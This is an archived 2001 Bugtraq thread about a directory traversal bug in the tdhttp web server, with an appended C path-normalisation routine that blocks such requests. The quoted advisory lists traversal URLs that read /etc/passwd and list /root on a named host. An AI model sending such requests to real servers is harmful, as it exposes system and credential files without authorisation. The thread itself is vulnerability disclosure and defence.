[19196] in bugtraq


Re: tdhttp transversal bug

daemon@ATHENA.MIT.EDU (sekure)
Tue Feb 13 19:17:45 2001

Mime-Version: 1.0
Content-Type: text/plain; charset="KOI8-R"
Content-Transfer-Encoding: 7bit
Message-Id:  <002e01c095f2$c4640f50$6497a8c0@nt_hadrion.hadrion.com>
Date:         Tue, 13 Feb 2001 16:25:32 -0300
Reply-To: sekure <sekure@hadrion.com.br>
From: sekure <sekure@HADRION.COM.BR>
X-To:         UkR-XblP? <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM

Hello,
I did other tests... and it didn't work here again on my 3 Linux
servers... look:

http://192.168.151.100/../../../../../../../../../../etc/passwd
http://192.168.151.150/../../../../../../../../../../etc/passwd
http://192.168.151.1/../../../../../../../../../../etc/passwd

All return me this message:

Bad Request
Your browser sent a request that this server could not understand.
Invalid URI in request GET /../../../../../../../../../../etc/passwd HTTP/1.1

Thanks
[ ]'s

-----Original Message-----
From: UkR-XblP? <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM <BUGTRAQ@SECURITYFOCUS.COM>
Date: Monday, February 12, 2001 21:17
Subject: tdhttp transversal bug


>-=-=-=-=-=[ UkR security team - advisory n0. 7 ]=-=-=-=-=-
>tdhttp transversal bug
>-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>Date: 07.02.2001
>
>Problem: possibility of arbitrary file retrieval
>and directory listing on remote host, running
>tdhttp (http.c, probably all its versions).
>
>Workaround: try another http daemon (Apache, for ex.) and
>disable http service 'till that time.
>
>Comment: duh. I wonder if I can see /etc/passwd right in my IE
>window. No matter it's only beta version, I mean http.c.
>After all, this bug is well-known.
>
>Authors: XblP, S1LENCE
>
>Example:
>http://www.timduff.com/../../../../../../../../../../etc/passwd
>http://www.timduff.com/../../../../../../../../../../root/
>
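
Added example, not part of the original thread and not tdhttp's http.c: one way a small HTTP daemon can reject the request shape discussed above before it ever reaches open(), which is the behaviour the "Invalid URI in request" reply shows. The function name and the convention of returning -1 for a 400 response are assumptions, and the path is assumed to have been percent-decoded exactly once before the call.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper (added example). Normalises the path part of a request
 * line and refuses anything that would climb above the document root.
 * Assumption: the caller percent-decodes once BEFORE calling, never after.
 * Returns 0 and writes a root-relative path ("" for the root itself) to out,
 * or -1, which the caller should answer with 400 Bad Request. */
int normalize_request_path(const char *path, char *out, size_t outlen)
{
    size_t len = 0;                     /* bytes currently held in out */

    if (path == NULL || out == NULL || outlen == 0 || path[0] != '/')
        return -1;                      /* only absolute paths are accepted */
    out[0] = '\0';

    while (*path != '\0') {
        while (*path == '/')            /* collapse runs of '/' */
            path++;
        size_t seg = strcspn(path, "/");
        if (seg == 0)
            break;                      /* trailing slash, nothing left */

        if (seg == 1 && path[0] == '.') {
            /* "." keeps the current directory */
        } else if (seg == 2 && path[0] == '.' && path[1] == '.') {
            if (len == 0)
                return -1;              /* ".." at the root: traversal attempt */
            while (len > 0 && out[len - 1] != '/')
                len--;                  /* drop the last segment */
            if (len > 0)
                len--;                  /* and the separator before it */
            out[len] = '\0';
        } else {
            size_t need = seg + (len ? 1 : 0);
            if (len + need + 1 > outlen)
                return -1;              /* result would not fit */
            if (len)
                out[len++] = '/';
            memcpy(out + len, path, seg);
            len += seg;
            out[len] = '\0';
        }
        path += seg;
    }
    return 0;
}
```

The returned path is relative to the document root, so the server joins it to that root itself and never passes client-supplied ".." segments to the file system.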
